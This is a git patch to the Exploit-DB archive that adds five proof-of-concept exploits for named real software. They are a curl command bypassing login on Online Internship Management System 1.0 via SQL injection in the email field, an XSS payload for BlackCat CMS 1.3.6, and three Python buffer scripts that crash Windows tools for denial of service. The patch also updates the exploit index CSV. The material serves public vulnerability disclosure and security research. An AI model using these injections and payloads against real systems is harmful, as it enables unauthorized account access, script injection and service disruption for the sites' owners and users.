From 6dac9b14470d9dcbf97566529c63a69a8e2a6059 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 17 Feb 2021 05:01:55 +0000 Subject: [PATCH] DB: 2021-02-17 6 changes to exploits/shellcodes Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS) --- exploits/php/webapps/49469.txt | 1 + exploits/php/webapps/49564.txt | 18 ++++++++++++++++++ exploits/php/webapps/49565.txt | 13 +++++++++++++ exploits/windows/dos/49566.txt | 29 +++++++++++++++++++++++++++++ exploits/windows/dos/49567.txt | 27 +++++++++++++++++++++++++++ exploits/windows/dos/49568.txt | 29 +++++++++++++++++++++++++++++ files_exploits.csv | 5 +++++ 7 files changed, 122 insertions(+) create mode 100644 exploits/php/webapps/49564.txt create mode 100644 exploits/php/webapps/49565.txt create mode 100644 exploits/windows/dos/49566.txt create mode 100644 exploits/windows/dos/49567.txt create mode 100644 exploits/windows/dos/49568.txt diff --git a/exploits/php/webapps/49469.txt b/exploits/php/webapps/49469.txt index 11445358f..464aebbb5 100644 --- a/exploits/php/webapps/49469.txt +++ b/exploits/php/webapps/49469.txt @@ -4,6 +4,7 @@ # Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1 # Tested on Windows +# CVE: CVE-2021-3294 *XSS IMPACT:* 1: Steal the cookie diff --git a/exploits/php/webapps/49564.txt b/exploits/php/webapps/49564.txt new file mode 100644 index 000000000..8a451acf9 --- /dev/null +++ b/exploits/php/webapps/49564.txt @@ -0,0 +1,18 @@ +# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass +# Date: 16-02-2021 +# Exploit Author: Christian Vierschilling +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html +# Version: 1.0 +# Tested on: PHP 7.4.14, Linux x64_x86 + + +# --- Description --- # + +The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'. + +# --- Proof of concept --- # + +Curl request for authentication bypass via sql injection in parameter 'email': + +curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login=" \ No newline at end of file diff --git a/exploits/php/webapps/49565.txt b/exploits/php/webapps/49565.txt new file mode 100644 index 000000000..22c94d92c --- /dev/null +++ b/exploits/php/webapps/49565.txt @@ -0,0 +1,13 @@ +# Exploit Title: BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS) +# Date: 16-02-2021 +# Exploit Author: Kamaljeet Kumar - TATA Advanced Systems Limited +# Vendor Homepage: https://blackcat-cms.org/ +# Software Link: https://blackcat-cms.org/page/download.php +# Version: BlackCat CMS - 1.3.6 +# Tested on: Windows + +# Steps to Reproduce: + +1. To exploit this vulnerability an attacker has a login in the admin panel and clicks on the admin profile button. Then use " onmouseover=alert(1) " this XSS payload on Display name field and click on the Save button. + +2 .Then refresh the page and hover the mouse on Display name filed and our XSS message pop up. \ No newline at end of file diff --git a/exploits/windows/dos/49566.txt b/exploits/windows/dos/49566.txt new file mode 100644 index 000000000..486f9a432 --- /dev/null +++ b/exploits/windows/dos/49566.txt @@ -0,0 +1,29 @@ +# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) +# Date: 2021-02-15 +# Exploit Author: Ismael Nava +# Vendor Homepage: https://switchportmapper.com/ +# Software Link: https://switchportmapper.com/download.htm +# Version: 2.85.2 +# Tested on: Windows 10 Home x64 + + +#STEPS +# Open the program Managed Switch Port Mapping Tool +# In the left side select Settings from Router/Srvr 1 (for layer 2 Switches) +# Run the python exploit script, it will create a new .txt files +# Copy the content of the file "Gou.txt" +# Paste the content in the field IP Address and SNMP v1/v2c Read Community Name +# Click in OK +# End :) + + +buffer = 'F' * 10000 + +try: + file = open("Gou2.txt","w") + file.write(buffer) + file.close() + + print("Archive ready") +except: + print("Archive no ready") \ No newline at end of file diff --git a/exploits/windows/dos/49567.txt b/exploits/windows/dos/49567.txt new file mode 100644 index 000000000..80486f799 --- /dev/null +++ b/exploits/windows/dos/49567.txt @@ -0,0 +1,27 @@ +# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) +# Date: 2021-02-15 +# Exploit Author: Ismael Nava +# Vendor Homepage: http://agatasoft.com/ +# Software Link: http://agatasoft.com/Ping_Master_Pro.exe +# Version: 2.1 +# Tested on: Windows 10 Home x64 + +#STEPS +# Open the program AgataSoft PingMaster Pro +# In Tools select the option Trace Route +# Run the python exploit script, it will create a new .txt files +# Copy the content of the file "Gou.txt" +# Paste the content in the field Host name and click in Get IP from host name +# End :) + + +buffer = 'S' * 10000 + +try: + file = open("Gou.txt","w") + file.write(buffer) + file.close() + + print("Archive ready") +except: + print("Archive no ready") \ No newline at end of file diff --git a/exploits/windows/dos/49568.txt b/exploits/windows/dos/49568.txt new file mode 100644 index 000000000..34c626e5b --- /dev/null +++ b/exploits/windows/dos/49568.txt @@ -0,0 +1,29 @@ +# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) +# Date: 2021-02-15 +# Exploit Author: Ismael Nava +# Vendor Homepage: https://www.nsauditor.com/ +# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Version: 3.2.2.0 +# Tested on: Windows 10 Home x64 + + +#STEPS +# Open the program Nsauditor +# In Options select Configuration... +# Click in Security Events +# Run the python exploit script, it will create a new .txt files +# Copy the content of the file "Liella.txt" +# Paste the content in the field Event Description and click in Add Event +# End :) + + +buffer = 'U' * 10000 + +try: + file = open("Liella.txt","w") + file.write(buffer) + file.close() + + print("Archive ready") +except: + print("Archive no ready") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a82540083..3a4ebf875 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6768,6 +6768,9 @@ id,file,description,date,author,type,platform,port 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple, 49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",2021-01-04,stresser,dos,windows, 49489,exploits/multiple/dos/49489.html,"jQuery UI 1.12.1 - Denial of Service (DoS)",2021-01-28,"Rafael Cintra Lopes",dos,multiple, +49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows, +49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows, +49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -43752,3 +43755,5 @@ id,file,description,date,author,type,platform,port 49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple, 49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php, 49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php, +49564,exploits/php/webapps/49564.txt,"Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass",2021-02-16,"Christian Vierschilling",webapps,php, +49565,exploits/php/webapps/49565.txt,"BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)",2021-02-16,"Kamaljeet Kumar",webapps,php,